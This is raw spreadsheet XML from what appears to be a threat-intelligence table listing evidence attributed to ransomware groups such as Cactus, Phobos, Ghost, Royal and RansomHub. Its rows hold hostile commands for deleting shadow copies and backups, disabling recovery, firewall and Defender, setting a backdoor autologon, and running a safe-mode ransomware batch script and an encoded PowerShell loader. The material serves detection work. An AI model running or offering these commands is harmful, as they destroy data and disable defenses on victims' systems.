  <r>
    <s v="cactus-eid0010"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg add &quot;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System&quot; /v LegalNoticeText /t REG_SZ /d &quot;&quot; /f"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0011"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg add &quot;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System&quot; /v LegalNoticeCaption /t REG_SZ /d &quot;&quot; /f"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0012"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg add &quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v AutoAdminLogon /t REG_SZ /d 1 /f"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0013"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg add &quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v DefaultUserName /t REG_SZ /d Adm1nBac /f"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0014"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg add &quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v DefaultPassword /t REG_SZ /d P@ssW0dDP@ssW /f"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0015"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg add &quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v AutoLogonCount /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0016"/>
    <x v="0"/>
    <x v="2"/>
    <s v="reg add &quot;HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot; /v &quot;*!test&quot; /t REG_SZ /d &quot;C:\windows\f2.bat&quot; /f"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0017"/>
    <x v="0"/>
    <x v="2"/>
    <s v="powershell.exe -ex bypass -nop -file totalexec.ps1 -CMD c:\windows\f1.bat -ACC .\admin1234 -SECR Pa$$w0rd12321 -EXE f1.bat,f2.bat,.7z,7.exe -LIST ips.txt -JOBS 10 -CHUNK 10 -WAIT 5"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0018"/>
    <x v="0"/>
    <x v="5"/>
    <s v="Script@echo off_x000a_SETLOCAL EnableExtensions_x000a_bcdedit /deletevalue {default} safeboot_x000a_C:\Windows\7.exe x C:\Windows\.7z -p1234 -o&quot;C:\Windows&quot;_x000a_del C:\Windows\7.exe_x000a_del C:\Windows\.7z_x000a_C:\Windows\.exe -i_x000a_SET EXE=.exe_x000a_:Running_x000a_FOR /F %%x IN ('tasklist /NH /FI &quot;IMAGENAME eq %EXE%&quot;') DO IF NOT %%x == %EXE% (_x000a_  ECHO %EXE% is Not Running_x000a_  GOTO notRunning_x000a_) ELSE (_x000a_  ECHO %EXE is running_x000a_timeout /t 10_x000a_ GOTO Running_x000a_)_x000a_..._x000a_:notRunning_x000a_  ECHO %EXE% is Not Running_x000a_del C:\Windows\.exe_x000a_shutdown -r -t 5 -c &quot;Computer Will Now Restart In NORMAL MODE...&quot;_x000a_del &quot;%~f0&quot;"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="cactus-eid0019"/>
    <x v="0"/>
    <x v="5"/>
    <s v="import sys_x000a_import re_x000a_f=None_x000a_ _x000a_try:_x000a_  f=open(sys.argv[1]);_x000a_except:_x000a_  print(&quot;Problem Opening file&quot;)_x000a_  print(&quot;Usage: python3 decode.py file_to_decode&quot;)_x000a_  print(&quot;Example: python3 decode.py ntuser.dat&quot;)_x000a_  sys.exit(1)_x000a_ _x000a_ _x000a_character_alignment=1   _x000a_datastart='[cCdD]:\\\\' # Data Starts with a path to executable_x000a_seperator='\|'          # Uses pipe character end of field_x000a_ _x000a_buffer=f.read()[character_alignment:]_x000a_ _x000a_l=len(buffer)_x000a_c=0_x000a_tmpstr=&quot;&quot;_x000a_ _x000a_while c &lt; l:_x000a_    hex_byte=buffer[c:c+2].upper()_x000a_    ch=chr(int(hex_byte, 16))_x000a_    tmpstr=tmpstr+&quot;&quot;+str(ch)_x000a_    c+=2_x000a_ _x000a_extracted=re.search(r''+datastart+'.*'+seperator,tmpstr)_x000a_if extracted:_x000a_    print(extracted.group())_x000a_else: # fall back to dump of all text_x000a_    print(tmpstr)"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="eightb-eid0001"/>
    <x v="0"/>
    <x v="0"/>
    <s v=".8base "/>
    <s v="file extension"/>
    <x v="4"/>
  </r>
  <r>
    <s v="eightb-eid0002"/>
    <x v="0"/>
    <x v="6"/>
    <s v="%AppData%\Local\{malware} %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\{malware} %AppData%\Roaming\Microsoft\Start Menu\Programs\Startup\{malware}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="eightb-eid0003"/>
    <x v="0"/>
    <x v="2"/>
    <s v="WNetEnumResource()"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="eightb-eid0004"/>
    <x v="13"/>
    <x v="2"/>
    <s v="wmic shadowcopy delete"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="eightb-eid0005"/>
    <x v="0"/>
    <x v="2"/>
    <s v="wbadmin delete catalog -quiet"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="eightb-eid0006"/>
    <x v="10"/>
    <x v="2"/>
    <s v="vssadmin delete shadows /all /quiet"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="eightb-eid0007"/>
    <x v="0"/>
    <x v="2"/>
    <s v="bcdedit /set {default} recoveryenabled no"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="eightb-eid0008"/>
    <x v="0"/>
    <x v="2"/>
    <s v="bcdedit /set {default} bootstatuspolicy ignoreallfailures"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ghost-eid0001"/>
    <x v="0"/>
    <x v="2"/>
    <s v="Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend."/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0002"/>
    <x v="0"/>
    <x v="1"/>
    <s v="SharpShares"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0003"/>
    <x v="0"/>
    <x v="7"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0004"/>
    <x v="0"/>
    <x v="1"/>
    <s v="SharpZeroLogon.exe"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0005"/>
    <x v="11"/>
    <x v="2"/>
    <s v="powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA…"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0006"/>
    <x v="11"/>
    <x v="2"/>
    <s v="$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0007"/>
    <x v="0"/>
    <x v="1"/>
    <s v="mega.nz"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0008"/>
    <x v="0"/>
    <x v="7"/>
    <s v="For example, http://xxx.xxx.xxx.xxx:80/Google.com where xxx.xxx.xxx.xxx represents the C2 server’s IP address. Cobalt Strike"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0009"/>
    <x v="0"/>
    <x v="1"/>
    <s v="SharpGPPPass.exe"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0010"/>
    <x v="0"/>
    <x v="1"/>
    <s v="SpnDump.exe"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0011"/>
    <x v="0"/>
    <x v="1"/>
    <s v="github[.]com/BronzeTicket/SharpNBTScan - nbt.exe"/>
    <s v="A compiled version of SharpNBTScan,_x000a_a NetBIOS scanner. Ghost actors use_x000a_this tool for hostname and IP address_x000a_enumeration."/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0012"/>
    <x v="0"/>
    <x v="1"/>
    <s v="BadPotato.exe"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ghost-eid0013"/>
    <x v="0"/>
    <x v="1"/>
    <s v="God.exe - github[.]com/BeichenDream/GodPotato"/>
    <s v="God.exe is a compiled version of_x000a_GodPotato and is used for privilege_x000a_escalation."/>
    <x v="5"/>
  </r>
  <r>
    <s v="phobos-eid00001"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Bloodhound - Sharphound"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00002"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Nirsoft"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00003"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Passview"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00004"/>
    <x v="3"/>
    <x v="1"/>
    <s v="Mimikatz"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00005"/>
    <x v="0"/>
    <x v="1"/>
    <s v="ProcessHacker"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00006"/>
    <x v="0"/>
    <x v="1"/>
    <s v="PowerTool "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00007"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Universal Virus Sniffer"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00008"/>
    <x v="14"/>
    <x v="0"/>
    <s v="MSHTA execute files "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00009"/>
    <x v="14"/>
    <x v="2"/>
    <s v="mshta C:\info.hta"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00010"/>
    <x v="14"/>
    <x v="2"/>
    <s v="mshta C:\%PUBLIC%\Desktop\info.hta"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00011"/>
    <x v="14"/>
    <x v="2"/>
    <s v="mshta C:\%USERPROFILE%\Desktop\info.hta"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00012"/>
    <x v="0"/>
    <x v="2"/>
    <s v="wbadmin delete catalog -quiet"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00013"/>
    <x v="0"/>
    <x v="2"/>
    <s v="bcdedit /set {default} recoveryenabled no"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00014"/>
    <x v="0"/>
    <x v="2"/>
    <s v="bcdedit /set {default} bootstatuspolicy ignoreallfailures"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00015"/>
    <x v="9"/>
    <x v="2"/>
    <s v="netsh firewall set opmode mode=disable"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00016"/>
    <x v="13"/>
    <x v="2"/>
    <s v="wmic shadowcopy delete"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00017"/>
    <x v="9"/>
    <x v="2"/>
    <s v="netsh advfirewall set currentprofile state off"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="phobos-eid00018"/>
    <x v="10"/>
    <x v="2"/>
    <s v="vssadmin delete shadows /all /quiet "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="play-eid0001"/>
    <x v="0"/>
    <x v="0"/>
    <s v="Distribute EXE Via GPO"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0002"/>
    <x v="3"/>
    <x v="1"/>
    <s v="MimiKatz"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0003"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Gmer"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0004"/>
    <x v="0"/>
    <x v="1"/>
    <s v="IOBit"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0005"/>
    <x v="0"/>
    <x v="1"/>
    <s v="PowerTool"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0006"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Grixba"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0007"/>
    <x v="0"/>
    <x v="1"/>
    <s v="ProcessHacker"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0008"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Plink"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0009"/>
    <x v="6"/>
    <x v="1"/>
    <s v="Nltest"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0010"/>
    <x v="0"/>
    <x v="1"/>
    <s v="WInPEAS"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0011"/>
    <x v="0"/>
    <x v="1"/>
    <s v="WinSCP"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0012"/>
    <x v="0"/>
    <x v="1"/>
    <s v="WinRAR"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0013"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Nekto - PriviCMD"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0014"/>
    <x v="0"/>
    <x v="7"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0015"/>
    <x v="12"/>
    <x v="1"/>
    <s v="PsExec"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0016"/>
    <x v="1"/>
    <x v="1"/>
    <s v="AdFind"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0017"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Bloodhound"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0018"/>
    <x v="15"/>
    <x v="1"/>
    <s v="GMER"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="play-eid0019"/>
    <x v="0"/>
    <x v="0"/>
    <s v="A .play extension"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="royal-eid0001"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Nsudo Tool"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="royal-eid0002"/>
    <x v="0"/>
    <x v="2"/>
    <s v="nircmd elevatecmd exec hide &quot;requestadmin.bat&quot;"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="royal-eid0003"/>
    <x v="0"/>
    <x v="8"/>
    <s v="Nsudo file drop_x000a_Nsudo runtime_x000a_Nsudo AV tampering commandline_x000a__x000a_Ransom:Win32/BlackCat!MSR_x000a_Ransom:Win32/BlackCat.MK!MTB_x000a_Ransom:Linux/BlackCat.A!MTB"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="royal-eid0004"/>
    <x v="0"/>
    <x v="8"/>
    <s v="Trojan:Win32/Gozi_x000a_Trojan:Win64/Gozi_x000a_VirTool:Win32/CobaltStrike_x000a_VirTool:Win64/CobaltStrike_x000a_Behavior:Win64/CobaltStrike_x000a_Trojan:Win32/VidarStealer"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="royal-eid0005"/>
    <x v="0"/>
    <x v="9"/>
    <s v="Ransomware-linked DEV-0569 activity group_x000a_Ransomware-linked DEV-0858 activity group_x000a_Cobalt Strike activity detected_x000a_Cobalt Strike activity observed_x000a_Cobalt Strike artifact observed_x000a_Cobalt Strike attack tool_x000a_Cobalt strike named pipes_x000a_‘Vidar’ credential theft malware was detected_x000a_‘VidarStealer’ malware was detected_x000a_‘Gozi’ malware was detected_x000a_An active ‘Nsudo’ hacktool in a command line was detected while executing_x000a_An active ‘NSudo’ hacktool process was detected while executing"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="royal-eid0006"/>
    <x v="0"/>
    <x v="0"/>
    <s v="Encrypts files and appends &quot;.royal or_x000a_&quot;.royal_w&quot; extensions to filenames"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="royal-eid0007"/>
    <x v="0"/>
    <x v="0"/>
    <s v="Written in C++ &amp; targets windows"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="royal-eid0008"/>
    <x v="0"/>
    <x v="7"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="royal-eid0009"/>
    <x v="1"/>
    <x v="1"/>
    <s v="adfind"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="royal-eid0010"/>
    <x v="5"/>
    <x v="1"/>
    <s v="Rclone"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="royal-eid0011"/>
    <x v="0"/>
    <x v="2"/>
    <s v="\\&lt;IP_Address&gt;\ADMIN$” or “\\&lt;IP_Address&gt;\IPC$"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="royal-eid0012"/>
    <x v="8"/>
    <x v="1"/>
    <s v="netscan"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="royal-eid0013"/>
    <x v="12"/>
    <x v="1"/>
    <s v="PsExec"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransomhub-eid0001"/>
    <x v="3"/>
    <x v="1"/>
    <s v="mimikatz "/>
    <s v="A tool that allows users to view and save authentication credentials_x000a_such as Kerberos tickets. RansomHub affiliates have used it to aid_x000a_privilege escalation."/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0002"/>
    <x v="2"/>
    <x v="1"/>
    <s v="anydesk"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0003"/>
    <x v="0"/>
    <x v="1"/>
    <s v="connectwise"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0004"/>
    <x v="0"/>
    <x v="7"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0005"/>
    <x v="0"/>
    <x v="1"/>
    <s v="N-Able"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0006"/>
    <x v="5"/>
    <x v="1"/>
    <s v="Rclone"/>
    <s v="A command line program used to sync files with cloud storage_x000a_services."/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0007"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Metasploit"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0008"/>
    <x v="0"/>
    <x v="0"/>
    <s v="BITSAdmin"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0009"/>
    <x v="0"/>
    <x v="7"/>
    <s v="Sliver"/>
    <s v="A penetration testing toolset which allows for remote command and_x000a_control of systems."/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0010"/>
    <x v="0"/>
    <x v="1"/>
    <s v="SMBExec"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0011"/>
    <x v="0"/>
    <x v="1"/>
    <s v="CrackMapExec"/>
    <s v="Pentest Toolset"/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0012"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Kerberoast"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0013"/>
    <x v="0"/>
    <x v="1"/>
    <s v="AngryIPScanner"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0014"/>
    <x v="0"/>
    <x v="6"/>
    <s v="C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\kerbrute.exe"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0015"/>
    <x v="0"/>
    <x v="6"/>
    <s v="C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\crackmapexec.exe "/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0016"/>
    <x v="0"/>
    <x v="6"/>
    <s v="C:\Users\%USERNAME%\Downloads\Anydesk.exe"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0017"/>
    <x v="0"/>
    <x v="6"/>
    <s v="C:\Users\%USERNAME%\Downloads\mimikatz_trunk\x64\mimikatz.exe"/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransomhub-eid0018"/>
    <x v="0"/>
    <x v="6"/>
    <s v="C:\Users\backupexec\Downloads\x64\mimikatz.exe"/>
    <m/>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8AD1DF-3DB8-054B-BD0F-DA0E260C9DC3}" name="PivotTable7"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5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="6">
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0">
      <items count="17">
        <item x="1"/>
        <item x="2"/>
        <item x="15"/>
        <item x="3"/>
        <item x="14"/>
        <item x="7"/>
        <item x="8"/>
        <item x="9"/>
        <item x="4"/>
        <item x="6"/>
        <item x="12"/>
        <item x="11"/>
        <item x="5"/>
        <item x="10"/>
        <item x="13"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField dataField="1" showAll="0">
      <items count="11">
        <item x="7"/>
        <item x="2"/>
        <item x="4"/>
        <item x="6"/>
        <item x="0"/>
        <item x="1"/>
        <item x="8"/>
        <item x="9"/>
        <item x="5"/>
        <item x="3"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="12">
        <item x="9"/>
        <item x="3"/>
        <item x="4"/>
        <item x="8"/>
        <item x="7"/>
        <item x="6"/>
        <item x="10"/>
        <item x="0"/>
        <item x="1"/>
        <item x="2"/>
        <item x="5"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="5"/>
  </rowFields>
  <rowItems count="12">
    <i>
      <x/>
    </i>
    <i>
      <x v="1"/>
    </i>
    <i>
      <x v="2"/>
    </i>
    <i>
      <x v="3"/>
    </i>
    <i>
      <x v="4"/>
    </i>
    <i>
      <x v="5"/>
    </i>
    <i>
      <x v="6"/>
    </i>
    <i>
      <x v="7"/>
    </i>
    <i>
      <x v="8"/>
    </i>
    <i>
      <x v="9"/>
    </i>
    <i>
      <x v="10"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="-2"/>
  </colFields>
  <colItems count="2">
    <i>
      <x/>
    </i>
    <i i="1">
      <x v="1"/>
    </i>
  </colItems>
  <dataFields count="2">
    <dataField name="Count of map_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of eid_typ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F192" totalsRowShown="0" dataDxfId="6">
  <autoFilter ref="A1:F192" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F161">
    <sortCondition ref="A1:A161"/>
  </sortState>
  <tableColumns count="6">
    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="5"/>
    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="4"/>
    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="3"/>
    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="2"/>
    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="1"/>
    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E}" name="ns_me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F192"/>
  <sheetViews>
    <sheetView topLeftCell="A103" workbookViewId="0">
      <selection activeCell="B166" sqref="B166"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="27" customWidth="1"/>
    <col min="2" max="3" width="21.5" customWidth="1"/>
    <col min="4" max="4" width="102.33203125" customWidth="1"/>
    <col min="5" max="5" width="68.33203125" customWidth="1"/>
    <col min="6" max="6" width="147.33203125" customWidth="1"/>
    <col min="7" max="7" width="147.1640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" t="s">
        <v>1</v>
      </c>
      <c r="C1" t="s">
        <v>5</v>
      </c>
      <c r="D1" t="s">
        <v>3</v>
      </c>
      <c r="E1" t="s">
        <v>2</v>
      </c>
      <c r="F1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="2" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>77</v>
      </c>
      <c r="B2" s="1"/>
      <c r="C2" s="1" t="s">
        <v>47</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>78</v>
      </c>
      <c r="E2" s="1"/>
      <c r="F2" s="1" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>79</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>411</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>81</v>
      </c>
      <c r="E3" s="1"/>
      <c r="F3" s="1" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>82</v>
      </c>
      <c r="B4" s="1"/>
      <c r="C4" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>83</v>
      </c>
      <c r="E4" s="1"/>
      <c r="F4" s="1" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>84</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>410</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>85</v>
      </c>
      <c r="E5" s="1"/>
      <c r="F5" s="1" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>86</v>
      </c>
      <c r="B6" s="1"/>
      <c r="C6" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>87</v>
      </c>
      <c r="E6" s="1"/>
      <c r="F6" s="1" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>88</v>
      </c>
      <c r="B7" s="1"/>
      <c r="C7" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>89</v>
      </c>
      <c r="E7" s="1"/>
      <c r="F7" s="1" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>90</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>409</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>11</v>
      </c>
      <c r="E8" s="1"/>
      <c r="F8" s="1" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>91</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>405</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>92</v>
      </c>
      <c r="E9" s="1"/>
      <c r="F9" s="1" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="10" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>93</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>408</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>94</v>
      </c>
      <c r="E10" s="1"/>
      <c r="F10" s="1" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="11" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>95</v>
      </c>
      <c r="B11" s="1"/>
      <c r="C11" s="1" t="s">
        <v>10</v>
      </c>
      <c r="D11" s="1" t="s">
